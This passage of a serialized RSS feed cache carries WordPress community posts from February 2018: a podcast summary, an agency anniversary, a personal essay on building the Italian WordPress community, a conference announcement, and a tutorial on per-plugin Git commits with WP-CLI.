5.8\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wptavern.com?p=78136&preview=true&preview_id=78136\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"https://wptavern.com/wpweekly-episode-305-10up-javascript-for-wordpress-conference-and-jetpack-5-8\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1599:\"<p>In this episode, <a href=\"http://jjj.me\">John James Jacoby</a> and I discuss the news of the week. We also chat about the Winter Olympics, crypto mining in order to access content on the web, and the joys of taking care of a puppy. Last but not least, we talk about Elasticsearch in Jetpack 5.8 and whether or not improving WordPress&#8217; native search functionality through a service is the way to go.</p>\n<h2>Stories Discussed:</h2>\n<p><a href=\"https://wptavern.com/jetpack-5-8-adds-lazy-loading-for-images-module\">Jetpack 5.8 Adds Lazy Loading for Images Module</a><br />\n<a href=\"https://wptavern.com/free-virtual-wordpress-for-javascript-conference-june-29th\">Free Virtual WordPress for JavaScript Conference June 29th</a><br />\n<a href=\"https://wptavern.com/10up-turns-seven\">10up Turns Seven</a><br />\n<a href=\"https://make.wordpress.org/plugins/2018/02/13/not-updated-in-warning/\">“Not Updated In …” Warning</a></p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, February 21st 3:00 P.M. Eastern</p>\n<p>Subscribe to <a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\">WordPress Weekly via Itunes</a></p>\n<p>Subscribe to <a href=\"https://www.wptavern.com/feed/podcast\">WordPress Weekly via RSS</a></p>\n<p>Subscribe to <a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\">WordPress Weekly via Stitcher Radio</a></p>\n<p>Subscribe to <a href=\"https://play.google.com/music/listen?u=0#/ps/Ir3keivkvwwh24xy7qiymurwpbe\">WordPress Weekly via Google Play</a></p>\n<p><strong>Listen To Episode #305:</strong><br />\n</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 15 Feb 2018 02:14:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"WPTavern: 10up Turns Seven\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=78132\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"https://wptavern.com/10up-turns-seven\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2986:\"<p><a href=\"https://10up.com/\">10up</a>, a web development agency founded by Jake Goldman in 2011, has turned seven years old. In a <a href=\"https://10up.com/blog/2018/10up-seven-year-anniversary/\">blog post celebrating the occasion</a>, Goldman reviews the previous year and highlights some notable events for the company.</p>\n<p>&#8220;We welcomed more than 30 new clients to our portfolio in another record sales year,&#8221; Goldman said. &#8220;We launched new websites along with web and mobile apps for major brands across verticals as diverse as finance, healthcare, academia, high-tech, big media, consumer packaged goods, food and beverage, and fitness… to name a few.&#8221;</p>\n<p>He also highlighted the company&#8217;s commitment to open source and giving back to WordPress. Throughout the past year, the company has released a number of WordPress plugins and developer tools including, <a href=\"https://10up.com/blog/2017/distributor-plugin/\">Distributor</a>, <a href=\"https://10up.com/blog/2017/wp-snapshots-share-wordpress-setup/\">WP Snapshots</a>, <a href=\"https://10up.com/blog/2017/wp-docker/\">WP Local Docker</a>, <a href=\"https://10up.com/blog/2018/improving-wordpress-transients/\">Async Transients</a>, and more.</p>\n<p>Goldman describes three trends he&#8217;s noticed in the past few years.</p>\n<ol>\n<li>Integrations with innovation happening in other projects and platforms has become increasingly important as the web matures. You see it in React.js and Vue.js emerging as popular front end standards, in the rise of Elasticsearch and NoSQL platforms, with two factor authentication and Google single sign on, with the rise of modern Asset Management Systems.</li>\n<li>For publishers, it’s increasingly becoming about distribution to multiple platforms, more so than<em> just</em> building a website. Google AMP, Facebook Articles, Apple News, Alexa, YouTube channels to name a few.</li>\n<li>If you need any more evidence of WordPress dominance, look no further than how highly in demand top-tier engineering talent is. It’s probably &#8211; literally &#8211; around a factor of 1.5x &#8211; 2x what great engineers were earning 3-4 years ago.</li>\n</ol>\n<p>With seven years of experience under his belt, Goldman offers the following advice for those who are in their first or second year of running an agency or in a leadership position.</p>\n<ol>\n<li> Don’t be quite so hard on yourself &#8211; when you run a business &#8211; when you’re a lease &#8211; there will always be highs and lows &#8211; don’t dwell on the lows.</li>\n<li>Put more emphasis on building systems, routines, and check-ins that offer a better pulse on the collective and individual fulfillment, engagement, and health of the team, rather than relying on transparent upwards communication.</li>\n</ol>\n<p>Congrats to 10up on seven years in business. To learn more about the company and employment opportunities, visit their <a href=\"https://10up.com/\">official site</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 14 Feb 2018 19:16:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"HeroPress: My WordPress Anniversaries\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://heropress.com/?post_type=heropress-essays&p=2452\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:126:\"https://heropress.com/essays/my-wordpress-anniversaries/#utm_source=rss&utm_medium=rss&utm_campaign=my-wordpress-anniversaries\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:13243:\"<img width=\"960\" height=\"480\" src=\"https://heropress.com/wp-content/uploads/2018/02/021418-1024x512.jpg\" class=\"attachment-large size-large wp-post-image\" alt=\"Pull Quote: I feel that I am responsible to be on stage for all the women who haven’t found the courage yet to share their stories.\" /><p>I never remember dates. I know the birthday of more or less five people. I insist on saying that my son was born on May 11. Incorrect, I was born on May 11, he on May 17. But for some reason, my WordPress dates are permanently etched into my brain. I think it’s because meeting the global WordPress community and helping restart the Italian community are very meaningful moments in my adult life. Please join me in a walk down memory lane <img src=\"https://s.w.org/images/core/emoji/2.4/72x72/1f642.png\" alt=\"🙂\" class=\"wp-smiley\" /></p>\n<h3>May 15, 2015</h3>\n<p>I started building websites with WordPress in 2010: my first website was my own blog, whose only purpose was to publish photos of my son so all the grandparents could enjoy seeing him grow. I enjoyed tinkering around with it, and to my surprise someone wrote asking me to build something similar for them. And they wanted to pay me for it!</p>\n<p>For a few years I worked as an administrative manager during the day and as a web designer at night until I decided to make the jump and become a freelancer.</p>\n<p>I never thought about contributing to WordPress because I wasn’t a back end developer and I didn’t think the project needed people that were not code wizards. Heck, I didn’t even know how WordPress was made or how open source worked exactly!</p>\n<blockquote><p>And then I went to a Freelancers conference in Italy and on May 15 I gave my first talk ever.</p></blockquote>\n<p>Up until that moment I taught small classes, but I never talked in front of more than ten people. I was terrified: in the audience there were more than a hundred people. Some of my friends, but also a lot of seasoned professionals that I respected and admired, and here I was talking about how they should and shouldn’t build a website. I was so nervous, when I grabbed the mic I did such a wide gesture with my arms that the bracelet I was wearing flew through the air to the other side of the room.</p>\n<p>After my talk a guy came to compliment my talk, and I realised that he was one of those people that I respected and admired from afar: <a href=\"https://twitter.com/lucasartoni\">Luca Sartoni</a>, an Automattician whose blog I have been following for a while.</p>\n<p>For the three days of the event we kept chatting about websites, WordPress, entrepreneurship, open source until he convinced me to start a WordPress meetup in my hometown of Torino, Italy. He put me in contact with other people that he knew wanted to do something similar and in less than a month from that conversation we started a meetup. The group now has more than one thousand members, and in March we will celebrate thirty events.</p>\n<h3>November 7, 2015</h3>\n<p>Luca didn’t stop his proselytism in Torino <img src=\"https://s.w.org/images/core/emoji/2.4/72x72/1f642.png\" alt=\"🙂\" class=\"wp-smiley\" /> That same year, WordCamp Europe was held in Seville and at the Polyglots table a revolution was started. A small group of Italians, used to travelling abroad to attend WordCamps, met there and decided that it was time to organise the Italian community.</p>\n<p>The first step was to revive the blog on the Italian WordPress website: it was dormant for seven years and the first thing we did was publish the dates of meetups that were slowly but surely appearing in the whole country. At the beginning of 2015 there were two meetups in Italy, by August there were eight and their number kept growing.</p>\n<p>Now, if you have met Italians, you know we talk a lot. The two Francescos from Apulia, <a href=\"https://twitter.com/franzvitulli\">Franz Vitulli</a> and <a href=\"https://twitter.com/fra83\">Francesco Di Candia</a>, took the second initiative that was crucial to bringing us together: they opened a Slack workspace for the Italians, modeled after the UK workspace. For the whole summer we chatted every single day: about WordPress, about how to grow and manage the community that was forming in front of our eyes, how to communicate, how to contribute.</p>\n<p>And then chatting wasn’t enough, we wanted to meet in person. We wanted to put a face and a voice to the avatars. With the help of <a href=\"https://twitter.com/rosso\">Sara Rosso</a> and <a href=\"https://twitter.com/miss_jwo\">Jenny Wong</a> we carried out a bizarre plan, almost unheard of: a <a href=\"https://wordpress.tv/2017/12/10/francesca-marano-standalone-contributor-days-help-make-wordpress-with-your-community/\">stand alone WordPress Contributor Day</a>. We would meet in Milano for a day to get to know each other and to learn how to Contribute to WordPress.</p>\n<blockquote><p>I like to think that November 7 2015 is the day we became a community: we were not an abstract idea anymore, we were people, meeting in person to make WordPress in Italy.</p></blockquote>\n<p>&nbsp;</p>\n<h3>April 10, 2016</h3>\n<p>The next few months went by in a blur of activities: the meetup organisers in Torino applied to host the first WordCamp in Italy in three years and I lead the organising team, I applied to attend the Community Summit in Philadelphia and I got accepted, I attended the first WordCamp US, my first WordCamp, and volunteered at it. I met a lot of people that helped me become more active and more focused: as a new contributor it’s easy to get overwhelmed by the abundance of amazing projects and tasks you can be part of, but it’s important to keep your focus to be more effective.</p>\n<blockquote><p>After meeting people from all over the world and sharing our experiences I realised the story of the Italian community could be inspiring for other communities and it was worth telling it to a wider audience, so I got completely out of my comfort zone and submitted a talk to WordCamp London.</p></blockquote>\n<p>On April 10th 2016 I gave <a href=\"https://wordpress.tv/2016/05/30/francesca-marano-rebirth-italian-community/\">my first talk at a WordCamp</a> and my first talk in English. I think I didn’t sleep for days before and after the event. It was nerve wracking, but I did it without throwing any bracelet in the air this time.</p>\n<a href=\"https://heropress.com/wp-content/uploads/2018/02/WCEU2016.jpg\"><img class=\"wp-image-2457 size-large\" src=\"https://heropress.com/wp-content/uploads/2018/02/WCEU2016-1024x684.jpg\" alt=\"\" width=\"960\" height=\"641\" /></a>I gave the same talk at WordCamp Europe in 2016 and realised the story was relatable to many communities. Photographer unknown, sorry <img src=\"https://s.w.org/images/core/emoji/2.4/72x72/1f641.png\" alt=\"🙁\" class=\"wp-smiley\" />\n<h3>September 17, 2017</h3>\n<p>Over the following year I kept contributing to WordPress, mostly in the Community team. I participated in the Polyglots activities for a while but then I had to pick and focus my attention. The more I interacted with people from all over the world as a hobby, the more I wanted that to become my job. Although my business as a web designer in Italy was doing good, I felt I wanted to be able to reach more people and find a way to be more involved with the community.<br />\nSo I started looking for a job. I was hesitant at first: all the insecurities I had about myself came back to haunt me. The voice in my head was telling me: you are too old, you don’t have enough technical expertise, you have been contributing for a very short time, English is not your native language, you are a single mom from Italy for crying out loud, who would want to employ you?</p>\n<blockquote><p>Well, it turns out that if you actually look for a job instead of just telling yourself that you really would like a job, chances are you might get one.</p></blockquote>\n<p>Last September I started a new chapter in my career as the <a href=\"https://www.siteground.com/blog/francesca-marano/\">WordPress Community Manager</a> at SiteGround and I couldn’t be happier.</p>\n<p>The past 33 months have completely changed my life, personally and professionally: along the way I learned a number of lessons that I know will stay with me forever.</p>\n<h3>Step Up</h3>\n<p>If you want to achieve something, start today. Just start. Start a meetup, leave a comment to encourage someone else, volunteer to take notes of a meeting, participate in the discussion, bring your own ideas to the table. Be a fire starter, for yourself and for the people around you.</p>\n<h3>Step Back</h3>\n<p>None of the above is about you: the community is bigger than you, you are here to build a path for the future. Once you started something, don’t become too attached, let it go and let other people step up and shine. Mentor them, if they ask and if you can.</p>\n<h3>If you want to go faster go alone, if you want to go further go together</h3>\n<p>I am not a huge fan of motivational quotes, but this one is very dear to my heart and it’s one I have to remind myself quite often. I am a perfectionist and a quick learner: this is ok when you start your own business (and it’s ok only at the beginning, but this is a topic for another article!), but when you are part of a team, you are part of something bigger. It might move slower, but its impact is immensely more powerful than anything you’ll be able to achieve on your own.</p>\n<h3>Representation matters</h3>\n<p>I dislike speaking in public. When I say this people tend to laugh it off because I am good on stage. It doesn’t mean that I like it. I am much more at ease when I am behind the scenes, making things happen.</p>\n<p><img class=\"aligncenter wp-image-2454 size-full\" src=\"https://heropress.com/wp-content/uploads/2018/02/slack-imgs.jpg\" alt=\"Four women seated on a low wall at a WordPress meetup.\" width=\"600\" height=\"400\" /></p>\n<blockquote><p>But representation matters: I feel that I am responsible to be on stage for all the women who haven’t found the courage yet to share their stories.</p></blockquote>\n<p>I am responsible for the young ones, so they can see that it’s possible to create a life when you can be both a good, albeit a bit absent mom, and a kick ass professional. I am responsible for the older ones, so they can see that we are represented, that this industry accepts us and recognizes our contributions. I am responsible to show my eleven year old son that women can do whatever they set out to do.</p>\n<h3>Make it better, give it back</h3>\n<p>I wish I came up with this, because it’s an incredibly powerful sentence. <a href=\"https://heropress.com/essays/make-better-give-back/\">John did</a> and I am grateful every day that I get to share my life with him and his wisdom.</p>\n<p>Contributing to open source can be very frustrating: things go slow, sometimes things don’t go at all (there are numerous tickets in the WordPress bug tracker that are five or more years old), sometimes you might disagree with that will be decided, sometimes you might work alongside people that you dislike.</p>\n<p>When this happens, remind yourself that you are working on a brilliant piece of software that is helping the lives and the businesses of millions of people.</p>\n<div class=\"rtsocial-container rtsocial-container-align-right rtsocial-horizontal\"><div class=\"rtsocial-twitter-horizontal\"><div class=\"rtsocial-twitter-horizontal-button\"><a title=\"Tweet: My WordPress Anniversaries\" class=\"rtsocial-twitter-button\" href=\"https://twitter.com/share?text=My%20WordPress%20Anniversaries&via=heropress&url=https%3A%2F%2Fheropress.com%2Fessays%2Fmy-wordpress-anniversaries%2F\" rel=\"nofollow\" target=\"_blank\"></a></div></div><div class=\"rtsocial-fb-horizontal fb-light\"><div class=\"rtsocial-fb-horizontal-button\"><a title=\"Like: My WordPress Anniversaries\" class=\"rtsocial-fb-button rtsocial-fb-like-light\" href=\"https://www.facebook.com/sharer.php?u=https%3A%2F%2Fheropress.com%2Fessays%2Fmy-wordpress-anniversaries%2F\" rel=\"nofollow\" target=\"_blank\"></a></div></div><div class=\"rtsocial-linkedin-horizontal\"><div class=\"rtsocial-linkedin-horizontal-button\"><a class=\"rtsocial-linkedin-button\" href=\"https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fheropress.com%2Fessays%2Fmy-wordpress-anniversaries%2F&title=My+WordPress+Anniversaries\" rel=\"nofollow\" target=\"_blank\" title=\"Share: My WordPress Anniversaries\"></a></div></div><div class=\"rtsocial-pinterest-horizontal\"><div class=\"rtsocial-pinterest-horizontal-button\"><a class=\"rtsocial-pinterest-button\" href=\"https://pinterest.com/pin/create/button/?url=https://heropress.com/essays/my-wordpress-anniversaries/&media=https://heropress.com/wp-content/uploads/2018/02/021418-150x150.jpg&description=My WordPress Anniversaries\" rel=\"nofollow\" target=\"_blank\" title=\"Pin: My WordPress Anniversaries\"></a></div></div><a rel=\"nofollow\" class=\"perma-link\" href=\"https://heropress.com/essays/my-wordpress-anniversaries/\" title=\"My WordPress Anniversaries\"></a></div><p>The post <a rel=\"nofollow\" href=\"https://heropress.com/essays/my-wordpress-anniversaries/\">My WordPress Anniversaries</a> appeared first on <a rel=\"nofollow\" href=\"https://heropress.com\">HeroPress</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 14 Feb 2018 07:00:49 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Francesca Marano\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: Free Virtual WordPress for JavaScript Conference June 29th\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=78116\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://wptavern.com/free-virtual-wordpress-for-javascript-conference-june-29th\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1714:\"<p>Zac Gordon, who <a href=\"https://wptavern.com/zac-gordon-launches-gutenberg-development-course-includes-more-than-30-videos\">launched his Gutenberg development course</a> earlier this year, is organizing a virtual conference called <a href=\"https://javascriptforwp.com/conference/\">JavaScript for WordPress.</a> The conference will take place June 29th and is free to watch.</p>\n<p>&#8220;Making the event free and online was really important for me so we could have as few barriers to entry for folks wanting to learn,&#8221; Gordon said. &#8220;I have a feeling a lot of folks who can&#8217;t tune live will still appreciate having all the talks available on YouTube for free.&#8221;</p>\n<p>So far, 15 speakers have been confirmed with more to be announced soon. The speakers include WordPress core developers, theme and plugin developers, agency owners, and educators. Some of the talks will be from designers allowing user experience and usability to be part of the conversation.</p>\n<p>Gordon says he&#8217;s been wanting to an in-person event for a while but considering the challenges involved, a virtual conference was the next best thing.</p>\n<p>&#8220;I used to run in-person workshops in the Washington DC area, which I miss, and have wanted to do an event for a while,&#8221; he said. &#8220;But doing in-person events is so difficult, so the online format seemed like the best option to go with. I got some good advice from Human Made and WP Campus, who both have experience doing online events, so hopefully everything will go smooth.&#8221;</p>\n<p>To reserve a seat and receive updates, visit the <a href=\"https://javascriptforwp.com/conference/\">JavaScript for WordPress conference site</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 13 Feb 2018 01:30:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"Mark Jaquith: Updating plugins using Git and WP-CLI\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://markjaquith.wordpress.com/?p=5552\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://markjaquith.wordpress.com/2018/02/12/updating-plugins-using-git-and-wp-cli/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4046:\"<p>Now that you know <a href=\"https://markjaquith.wordpress.com/2018/01/30/simple-wordpress-deploys-using-git/\">how I deploy WordPress sites</a> and <a href=\"https://markjaquith.wordpress.com/2018/02/05/tips-for-configuring-wordpress-environments/\">how I configure WordPress environments</a>, what about the maintenance of keeping a WordPress site&#8217;s plugins up-to-date?</p>\n<p>Since I&#8217;m using Git, I cannot use WordPress built-in plugin updater on the live site (and I wouldn&#8217;t want to — if a plugin update goes wrong, my live site could be in trouble!)</p>\n<p>The simple way to update all your plugins from a staging or local development site is to use WP-CLI:</p>\n<pre class=\"brush: bash; title: ; notranslate\">wp plugin update-all\ngit commit -am \'update all plugins\' wp-content/plugins</pre>\n<p>That works. I used to do that.</p>\n<p>I don&#8217;t do that anymore.</p>\n<p>Why? <strong>Granularity</strong>.</p>\n<p>One of the benefits of using version control like Git is that when things go wrong, you can pinpoint when they went wrong, and identify what code caused the issue.</p>\n<p>Git has a great tool called <strong>bisect</strong> that takes a known good state in the past and a current broken state, and then jumps around between revisions, efficiently, asking you to report whether that revision is <strong>good</strong> or <strong>bad</strong>. Then it tells you what revision broke your site.</p>\n<p>If you lump all your plugin updates into one commit, you won&#8217;t get that granularity. You&#8217;ll likely get the <strong>git bisect</strong> result of &#8220;great&#8230; one of EIGHTEEN PLUGINS I updated was the issue&#8221;. That doesn&#8217;t help.</p>\n<p>Here&#8217;s how you do it with granularity:</p>\n<pre class=\"brush: bash; title: ; notranslate\">for plugin in $(wp plugin list --update=available --field=name);\ndo\n    echo \"wp plugin update $plugin\" &amp;&amp;\n    echo \"git add -A wp-content/plugins/$plugin\" &amp;&amp;\n    echo \"git commit -m \'update $plugin plugin\'\";\ndone;</pre>\n<p>This code loops through plugins with updates available, updates each one, and commits it with a message that references the plugin being updated. Great! Now <strong>git bisect</strong> will be able to tell you <strong>which</strong> plugin update broke your site.</p>\n<p>And what if you can only run WP-CLI commands from within a VM, and Git commands from your local machine? For instance, if you&#8217;re using my favorite tool, <a href=\"https://local.getflywheel.com/\">Local by Flywheel</a>, you have to SSH into the site&#8217;s container to issue WP-CLI commands, but from within that container, you might not have Git configured like it is on your host machine.</p>\n<p>So what you can do is break the process into two steps.</p>\n<p>On the VM, run this:</p>\n<pre class=\"brush: bash; title: ; notranslate\">wp plugin list --update=available --field=name &gt; plugins.txt\nwp plugin update-all</pre>\n<p>That grabs a list of plugins with updates and writes them to a file <strong>plugins.txt</strong>, and then updates all the plugins.</p>\n<p>And then on your local machine, run this:</p>\n<pre class=\"brush: bash; title: ; notranslate\">while read plugin;\ndo\n    echo \"git add -A wp-content/plugins/$plugin\" &amp;&amp;\n    echo \"git commit -m \'update $plugin plugin\'\";\ndone; &lt; plugins.txt</pre>\n<p>That slurps in that list of updated plugins and does a distinct <strong>git add</strong> and <strong>git commit</strong> for each.</p>\n<p>When that&#8217;s done, remove <b>plugins.txt</b>.</p>\n<p>All your plugins are quickly updated with WP-CLI, but you get nice granular Git commits and messages.</p>\n<hr />\n<p><b>Do you need <a href=\"https://coveredwebservices.com/\">WordPress services?</a></b></p>\n<p>Mark runs <a href=\"https://coveredwebservices.com/\">Covered Web Services</a> which specializes in custom WordPress solutions with focuses on security, speed optimization, plugin development and customization, and complex migrations.</p>\n<p>Please reach out to start a conversation!</p>\n[contact-form]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 12 Feb 2018 14:42:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Mark Jaquith\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"Post Status: WordPress market opportunities: Upmarket edition — Draft podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=42360\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://poststatus.com/wordpress-market-opportunities-upmarket-edition-draft-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2284:\"<p>Welcome to the Post Status <a href=\"https://poststatus.com/category/draft\">Draft podcast</a>, which you can find <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">on iTunes</a>, <a href=\"https://play.google.com/music/m/Ih5egfxskgcec4qadr3f4zfpzzm?t=Post_Status__Draft_WordPress_Podcast\">Google Play</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, and <a href=\"http://simplecast.fm/podcasts/1061/rss\">via RSS</a> for your favorite 